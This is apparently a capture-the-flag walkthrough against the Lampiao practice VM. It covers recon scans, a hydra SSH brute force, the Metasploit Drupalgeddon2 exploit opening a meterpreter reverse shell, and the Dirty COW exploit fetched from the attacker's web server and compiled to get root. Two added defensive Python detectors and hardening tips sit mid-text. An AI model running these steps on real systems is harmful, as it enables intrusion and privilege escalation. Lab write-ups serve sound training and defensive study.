┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1 00:50:56:c0:00:08 VMware, Inc.
192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc.
192.168.3.14 00:0c:29:ab:2f:a2 VMware, Inc.
192.168.3.254 00:50:56:e0:91:13 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 4 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 06:40 EDT
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 06:41 (0:00:05 remaining)
Nmap scan report for 192.168.3.14
Host is up (0.00072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
| 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
| 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp open http?
| fingerprint-strings:
| NULL:
| _____ _ _
| |_|/ ___ ___ __ _ ___ _ _
| \x20| __/ (_| __ \x20|_| |_
| ___/ __| |___/ ___|__,_|___/__, ( )
| |___/
| ______ _ _ _
| ___(_) | | | |
| \x20/ _` | / _ / _` | | | |/ _` | |
|_ __,_|__,_|_| |_|
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:AB:2F:A2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.3.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.10 seconds

Visiting port 80

Visiting port 1898

Directory scan

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.3.14:1898
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.3.14_1898/_24-10-17_06-50-44.txt

Target: http://192.168.3.14:1898/

[06:50:44] Starting:
[06:50:46] 403 - 292B - /.ht_wsr.txt
[06:50:46] 403 - 295B - /.htaccess.bak1
[06:50:46] 403 - 295B - /.htaccess.save
[06:50:46] 403 - 295B - /.htaccess.orig
[06:50:46] 403 - 295B - /.htaccess_orig
[06:50:46] 403 - 296B - /.htaccess_extra
[06:50:46] 403 - 293B - /.htaccessBAK
[06:50:46] 403 - 293B - /.htaccessOLD
[06:50:46] 403 - 293B - /.htaccess_sc
[06:50:46] 403 - 285B - /.htm
[06:50:46] 403 - 294B - /.htaccessOLD2
[06:50:46] 403 - 286B - /.html
[06:50:46] 403 - 291B - /.htpasswds
[06:50:46] 403 - 292B - /.httr-oauth
[06:50:46] 403 - 295B - /.htpasswd_test
[06:50:46] 403 - 297B - /.htaccess.sample
[06:50:48] 403 - 286B - /.php3
[06:50:48] 403 - 285B - /.php
[06:51:00] 403 - 3KB - /authorize.php
[06:51:05] 200 - 32KB - /CHANGELOG.txt
[06:51:07] 200 - 769B - /COPYRIGHT.txt
[06:51:08] 403 - 7KB - /cron.php
[06:51:13] 301 - 321B - /includes -> http://192.168.3.14:1898/includes/
[06:51:13] 200 - 1KB - /includes/
[06:51:14] 200 - 132KB - /includes/bootstrap.inc
[06:51:14] 404 - 7KB - /index.php/login/
[06:51:14] 200 - 1KB - /install.php
[06:51:14] 200 - 868B - /INSTALL.mysql.txt
[06:51:14] 200 - 842B - /INSTALL.pgsql.txt
[06:51:14] 200 - 1KB - /install.php?profile=default
[06:51:15] 200 - 6KB - /INSTALL.txt
[06:51:15] 200 - 7KB - /LICENSE.txt
[06:51:16] 200 - 2KB - /MAINTAINERS.txt
[06:51:17] 301 - 317B - /misc -> http://192.168.3.14:1898/misc/
[06:51:17] 301 - 320B - /modules -> http://192.168.3.14:1898/modules/
[06:51:17] 200 - 844B - /modules/
[06:51:20] 301 - 321B - /profiles -> http://192.168.3.14:1898/profiles/
[06:51:20] 200 - 271B - /profiles/minimal/minimal.info
[06:51:20] 200 - 278B - /profiles/testing/testing.info
[06:51:20] 200 - 743B - /profiles/standard/standard.info
[06:51:22] 200 - 2KB - /README.txt
[06:51:23] 200 - 744B - /robots.txt
[06:51:23] 301 - 320B - /scripts -> http://192.168.3.14:1898/scripts/
[06:51:23] 200 - 641B - /scripts/
[06:51:24] 403 - 294B - /server-status
[06:51:24] 403 - 295B - /server-status/
[06:51:26] 301 - 318B - /sites -> http://192.168.3.14:1898/sites/
[06:51:26] 200 - 0B - /sites/example.sites.php
[06:51:26] 200 - 129B - /sites/all/libraries/README.txt
[06:51:26] 200 - 431B - /sites/README.txt
[06:51:26] 200 - 715B - /sites/all/modules/README.txt
[06:51:26] 200 - 545B - /sites/all/themes/README.txt
[06:51:29] 301 - 319B - /themes -> http://192.168.3.14:1898/themes/
[06:51:29] 200 - 527B - /themes/
[06:51:30] 403 - 4KB - /update.php
[06:51:30] 200 - 3KB - /UPGRADE.txt
[06:51:33] 200 - 2KB - /web.config
[06:51:35] 200 - 42B - /xmlrpc.php

Task Completed

robots.txt

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

CHANGELOG.txt


Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
(API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
(API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
type configuration page.
- File validation error message is now removed after subsequent upload of valid
file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions after 7.51 update
when jQuery is updated to 1.7-1.11.0.

Drupal 7.52, 2016-11-16
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2016-005.

Drupal 7.51, 2016-10-05
-----------------------
- The Update module now also checks for updates to a disabled theme that is
used as an admin theme.
- Exceptions thrown in dblog_watchdog() are now caught and ignored.
- Clarified the warning that appears when modules are missing or have moved.
- Log messages are now XSS filtered on display.
- Draggable tables now work on touch screen devices.
- Added a setting for allowing double underscores in CSS identifiers
(https://www.drupal.org/node/2810369).
- If a user navigates away from a page while an Ajax request is running they
will no longer get an error message saying "An Ajax HTTP request terminated
abnormally".
- The system_region_list() API function now takes an optional third parameter
which allows region name translations to be skipped when they are not needed
(API addition: https://www.drupal.org/node/2810365).
- Numerous performance improvements.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional automated test coverage.
......

It is a Drupal system.

Crawl the site and compile the harvested words into a password list

cewl http://192.168.3.14:1898/?q=node/1 -w 123.txt

Visiting

http://192.168.3.14:1898/?q=node/2

reveals the following:

audio.m4a: the voice recording gives the username: tiago
qrc.png: scanning the QR code in the image yields a hint; brute force is needed

With the username and the password list in hand, use hydra to brute-force SSH

┌──(root㉿kali)-[~]
└─# hydra -l tiago -P 123.txt ssh://192.168.3.14 -I -v

The password obtained:

Virgulino
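From the defender's side, a hydra run like the one above leaves a dense burst of "Failed password" lines in sshd's auth log, followed by a single "Accepted password" once the wordlist hits. The following is an added example (not from the original writeup) that parses such lines, alerts on a source producing five or more failures within a minute, and escalates the alert when a password login from the same source follows the burst; the log lines are constructed, and the year is assumed because syslog timestamps carry none.

```python
"""Flag the SSH password-guessing pattern that a hydra run leaves in sshd's
auth log: a burst of 'Failed password' lines from one source, then one
'Accepted password' once the wordlist hits.
Added example for this writeup; SAMPLE_AUTH_LOG is constructed and the year is
assumed (syslog timestamps carry none)."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed sshd lines in Ubuntu 14.04 /var/log/auth.log format.
SAMPLE_AUTH_LOG = """\
Oct 17 08:00:10 lampiao sshd[2201]: Failed password for tiago from 192.168.3.11 port 51002 ssh2
Oct 17 08:00:10 lampiao sshd[2203]: Failed password for tiago from 192.168.3.11 port 51004 ssh2
Oct 17 08:00:11 lampiao sshd[2205]: Failed password for invalid user admin from 192.168.3.11 port 51006 ssh2
Oct 17 08:00:11 lampiao sshd[2207]: Failed password for tiago from 192.168.3.11 port 51008 ssh2
Oct 17 08:00:12 lampiao sshd[2209]: Failed password for tiago from 192.168.3.11 port 51010 ssh2
Oct 17 08:00:12 lampiao sshd[2211]: Failed password for tiago from 192.168.3.11 port 51012 ssh2
Oct 17 08:00:13 lampiao sshd[2213]: Accepted password for tiago from 192.168.3.11 port 51014 ssh2
Oct 17 08:05:00 lampiao sshd[2300]: Failed password for tiago from 192.168.3.20 port 40000 ssh2
Oct 17 08:30:00 lampiao sshd[2400]: Accepted publickey for tiago from 192.168.3.20 port 40100 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_events(log: str, year: int = 2024) -> List[dict]:
    """Parse password/publickey outcomes; lines that are not auth results are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(f"{year} {ev['ts']}", "%Y %b %d %H:%M:%S")
        events.append(ev)
    return events

def detect_bruteforce(events: List[dict], threshold: int = 5, window_s: int = 60) -> List[dict]:
    """Alert per source IP once `threshold` failures fall inside `window_s` seconds
    (counted across usernames, since guessing runs also probe invalid users), and
    mark the alert as a likely compromise if a password login from that source
    follows the burst within the same window."""
    recent: Dict[str, List[datetime]] = defaultdict(list)   # failure times per source
    users: Dict[str, set] = defaultdict(set)                # usernames tried per source
    alerts: Dict[str, dict] = {}
    for ev in events:
        src, ts = ev["src"], ev["ts"]
        if ev["result"] == "Failed":
            users[src].add(ev["user"])
            recent[src] = [t for t in recent[src] if (ts - t).total_seconds() <= window_s] + [ts]
            if len(recent[src]) >= threshold:
                a = alerts.setdefault(src, {"src": src, "failures": 0, "success_after_burst": False})
                a["failures"] = max(a["failures"], len(recent[src]))
                a["users"] = sorted(users[src])
                a["last_failure"] = ts
        elif (ev["method"] == "password" and src in alerts
              and (ts - alerts[src]["last_failure"]).total_seconds() <= window_s):
            alerts[src]["success_after_burst"] = True
            alerts[src]["compromised_user"] = ev["user"]
    return sorted(alerts.values(), key=lambda a: a["src"])

if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(alert)
```

Key-only authentication plus a rate limiter such as fail2ban removes this attack path entirely; the detector above is for hosts where password logins must stay enabled.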

SSH login

┌──(root㉿kali)-[~]
└─# ssh tiago@192.168.3.14
The authenticity of host '192.168.3.14 (192.168.3.14)' can't be established.
ED25519 key fingerprint is SHA256:GGW0ASyjbhMycAKiglcXcsa0HvSwkLHZP9bQBtVrPs8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.14' (ED25519) to the list of known hosts.
tiago@192.168.3.14's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Thu Oct 17 08:00:57 BRT 2024

System load: 0.0 Processes: 216
Usage of /: 7.5% of 19.07GB Users logged in: 0
Memory usage: 34% IP address for eth0: 192.168.3.14
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Fri Apr 20 14:40:55 2018 from 192.168.108.1
tiago@lampiao:~$

Alternatively, a foothold can also be gained by exploiting the vulnerability

msf6 > search 2018-7600

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
1 \_ target: Automatic (PHP In-Memory) . . . .
2 \_ target: Automatic (PHP Dropper) . . . .
3 \_ target: Automatic (Unix In-Memory) . . . .
4 \_ target: Automatic (Linux Dropper) . . . .
5 \_ target: Drupal 7.x (PHP In-Memory) . . . .
6 \_ target: Drupal 7.x (PHP Dropper) . . . .
7 \_ target: Drupal 7.x (Unix In-Memory) . . . .
8 \_ target: Drupal 7.x (Linux Dropper) . . . .
9 \_ target: Drupal 8.x (PHP In-Memory) . . . .
10 \_ target: Drupal 8.x (PHP Dropper) . . . .
11 \_ target: Drupal 8.x (Unix In-Memory) . . . .
12 \_ target: Drupal 8.x (Linux Dropper) . . . .
13 \_ AKA: SA-CORE-2018-002 . . . .
14 \_ AKA: Drupalgeddon 2 . . . .


Interact with a module by name or index. For example info 14, use 14 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info

Name: Drupal Drupalgeddon 2 Forms API Property Injection
Module: exploit/unix/webapp/drupal_drupalgeddon2
Platform: PHP, Unix, Linux
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-03-28

Provided by:
Jasper Mattsson
a2u
Nixawk
FireFart
wvu <wvu@metasploit.com>

Module stability:
crash-safe

Available targets:
Id Name
-- ----
=> 0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload information:
Avoid: 3 characters

Description:
This module exploits a Drupal property injection in the Forms API.

Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

References:
https://nvd.nist.gov/vuln/detail/CVE-2018-7600
https://www.drupal.org/sa-core-2018-002
https://greysec.net/showthread.php?tid=2912
https://research.checkpoint.com/uncovering-drupalgeddon-2/
https://github.com/a2u/CVE-2018-7600
https://github.com/nixawk/labs/issues/19
https://github.com/FireFart/CVE-2018-7600

Also known as:
SA-CORE-2018-002
Drupalgeddon 2


View the full module info with the info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.3.14
rhosts => 192.168.3.14
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info

Name: Drupal Drupalgeddon 2 Forms API Property Injection
Module: exploit/unix/webapp/drupal_drupalgeddon2
Platform: PHP, Unix, Linux
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-03-28

Provided by:
Jasper Mattsson
a2u
Nixawk
FireFart
wvu <wvu@metasploit.com>

Module stability:
crash-safe

Available targets:
Id Name
-- ----
=> 0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.3.14 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 1898 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload information:
Avoid: 3 characters

Description:
This module exploits a Drupal property injection in the Forms API.

Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

References:
https://nvd.nist.gov/vuln/detail/CVE-2018-7600
https://www.drupal.org/sa-core-2018-002
https://greysec.net/showthread.php?tid=2912
https://research.checkpoint.com/uncovering-drupalgeddon-2/
https://github.com/a2u/CVE-2018-7600
https://github.com/nixawk/labs/issues/19
https://github.com/FireFart/CVE-2018-7600

Also known as:
SA-CORE-2018-002
Drupalgeddon 2


View the full module info with the info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.3.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.3.14
[*] Meterpreter session 1 opened (192.168.3.11:4444 -> 192.168.3.14:58080) at 2024-10-17 07:10:10 -0400



meterpreter > dir
Listing: /var/www/html
======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 475800772128957 fil 207442293773-05-16 03:36:21 -0400 CHANGELOG.txt
100755/rwxr-xr-x 6360846566857 fil 207442293773-05-16 03:36:21 -0400 COPYRIGHT.txt
100755/rwxr-xr-x 7374458848949 fil 207442293773-05-16 03:36:21 -0400 INSTALL.mysql.txt
100755/rwxr-xr-x 8048768714578 fil 207442293773-05-16 03:36:21 -0400 INSTALL.pgsql.txt
100755/rwxr-xr-x 5574867551506 fil 207442293773-05-16 03:36:21 -0400 INSTALL.sqlite.txt
100755/rwxr-xr-x 77287936509515 fil 207442293773-05-16 03:36:21 -0400 INSTALL.txt
100755/rwxr-xr-x 77704548337324 fil 207442293773-05-16 03:36:21 -0400 LICENSE.txt
100644/rw-r--r-- 14721481446804764 fil 207452918583-06-18 16:34:46 -0400 LuizGonzaga-LampiaoFalou.mp3
100755/rwxr-xr-x 37409165156870 fil 207442293773-05-16 03:36:21 -0400 MAINTAINERS.txt
100755/rwxr-xr-x 23115513992454 fil 207442293773-05-16 03:36:21 -0400 README.txt
100755/rwxr-xr-x 43477953947531 fil 207442293773-05-16 03:36:21 -0400 UPGRADE.txt
100644/rw-r--r-- 149099789715355 fil 207452827122-11-09 10:48:22 -0500 audio.m4a
100755/rwxr-xr-x 28363964029388 fil 207442293773-05-16 03:36:21 -0400 authorize.php
100755/rwxr-xr-x 3092376453840 fil 207442293773-05-16 03:36:21 -0400 cron.php
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 includes
100755/rwxr-xr-x 2272037700113 fil 207442293773-05-16 03:36:21 -0400 index.php
100755/rwxr-xr-x 3019362009791 fil 207442293773-05-16 03:36:21 -0400 install.php
100755/rwxr-xr-x 1149900184360404 fil 195804193645-09-25 03:18:20 -0400 lampiao.jpg
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 misc
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 modules
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 profiles
100644/rw-r--r-- 41549513631178 fil 207452657131-05-04 17:02:29 -0400 qrc.png
100755/rwxr-xr-x 9401683413133 fil 207442293773-05-16 03:36:21 -0400 robots.txt
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 scripts
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 sites
040755/rwxr-xr-x 17592186048512 dir 207442293773-05-16 03:36:21 -0400 themes
100755/rwxr-xr-x 85839216397842 fil 207442293773-05-16 03:36:21 -0400 update.php
100755/rwxr-xr-x 9448928053400 fil 207442293773-05-16 03:36:21 -0400 web.config
100755/rwxr-xr-x 1791001362849 fil 207442293773-05-16 03:36:21 -0400 xmlrpc.php

meterpreter > shell
Process 3564 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$

Either way, the result is only a low-privilege shell.
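The module's check step confirmed the version was in range, but a defender can see the same thing without touching the application logic: the target serves CHANGELOG.txt (the dirsearch run above got a 200 for it, robots.txt notwithstanding), so the exact core release is readable by anyone. As an added example (not from the original writeup), the following reads the newest version header from a CHANGELOG.txt body and classifies it against the SA-CORE-2018-002 ranges the module prints above (6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, < 8.5.1); the changelog text is a constructed excerpt mirroring the one fetched from the target.

```python
"""Read the Drupal core version from an exposed CHANGELOG.txt and test it against
the SA-CORE-2018-002 / CVE-2018-7600 ranges quoted by the Metasploit module:
6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6 and < 8.5.1.
Added example for this writeup; SAMPLE_CHANGELOG is a constructed excerpt."""
import re
from typing import Optional, Tuple

# Constructed excerpt modelled on the CHANGELOG.txt fetched from the target:
# the first header names the release that is actually installed.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions after 7.51 update
"""

# Matches "Drupal 7.54, 2017-02-01" or "Drupal 8.3.8, 2018-02-21" style headers.
HEADER_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?, \d{4}-\d{2}-\d{2}\s*$", re.M)

# Per 8.x branch: the first patch release that is NOT affected, from the module text.
FIXED_8X = {3: 9, 4: 6, 5: 1}

def newest_version(changelog: str) -> Optional[Tuple[int, ...]]:
    """Drupal lists releases newest-first, so the first header is the running version."""
    m = HEADER_RE.search(changelog)
    if m is None:
        return None
    return tuple(int(g) for g in m.groups() if g is not None)

def classify(version: Tuple[int, ...]) -> str:
    """'affected' / 'not affected' per the quoted ranges; 'not listed' for branches
    the advisory text on this page does not mention (8.0.x, 8.1.x, 9+)."""
    major, minor = version[0], version[1]
    patch = version[2] if len(version) > 2 else 0
    if major == 6:
        return "affected"                       # every 6.x
    if major == 7:
        return "affected" if minor < 58 else "not affected"
    if major == 8:
        if minor == 2:
            return "affected"                   # every 8.2.x
        if minor in FIXED_8X:
            return "affected" if patch < FIXED_8X[minor] else "not affected"
    return "not listed"

def audit_changelog(changelog: str) -> dict:
    """One-shot verdict for a fetched CHANGELOG.txt body."""
    v = newest_version(changelog)
    if v is None:
        return {"version": None, "sa_core_2018_002": "unknown"}
    return {"version": ".".join(map(str, v)), "sa_core_2018_002": classify(v)}

if __name__ == "__main__":
    print(audit_changelog(SAMPLE_CHANGELOG))
```

robots.txt only asks crawlers to stay away; denying the .txt files at the web server (or deleting them) is what actually stops this version disclosure.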

Reproducing Dirty COW privilege escalation and how to get a fully interactive shell - 先知社区 (aliyun.com)

Dirty COW privilege escalation

tiago@lampiao:~$ wget http://192.168.3.11:8082/40847.cpp  
--2024-10-17 09:14:53-- http://192.168.3.11:8082/40847.cpp
Connecting to 192.168.3.11:8082... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10212 (10.0K) [text/x-c++src]
Saving to: ‘40847.cpp’

100%[================================================================================================>] 10,212 --.-K/s in 0s

2024-10-17 09:14:53 (150 MB/s) - ‘40847.cpp’ saved [10212/10212]

tiago@lampiao:~$ ls
40847.cpp
tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yiyi 40847.cpp -lutil
tiago@lampiao:~$ ls
40847.cpp dayu
tiago@lampiao:~$ chmod 777 yiyi
tiago@lampiao:~$ ls
40847.cpp dayu
tiago@lampiao:~$ ./yiyi
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)
tiago@lampiao:~$

msf6 > searchsploit -m linux/local/40847.cpp
[*] exec: searchsploit -m linux/local/40847.cpp

Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40847
Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
Codes: CVE-2016-5195
Verified: True
File Type: C++ source, ASCII text
Copied to: /root/yiyi/40847.cpp


msf6 > exit


┌──(root㉿kali)-[~/yiyi]
└─# python -m http.server 8082
Serving HTTP on 0.0.0.0 port 8082 (http://0.0.0.0:8082/) ...
192.168.3.14 - - [17/Oct/2024 08:14:54] "GET /40847.cpp HTTP/1.1" 200 -

Now just log in directly with it

tiago@lampiao:~$ su
Password:
root@lampiao:/home/tiago# whoami
root
root@lampiao:/home/tiago# ls /root
flag.txt
root@lampiao:/home/tiago# nl /root/flag.txt
1 9740616875908d91ddcdaa8aea3af366
root@lampiao:/home/tiago#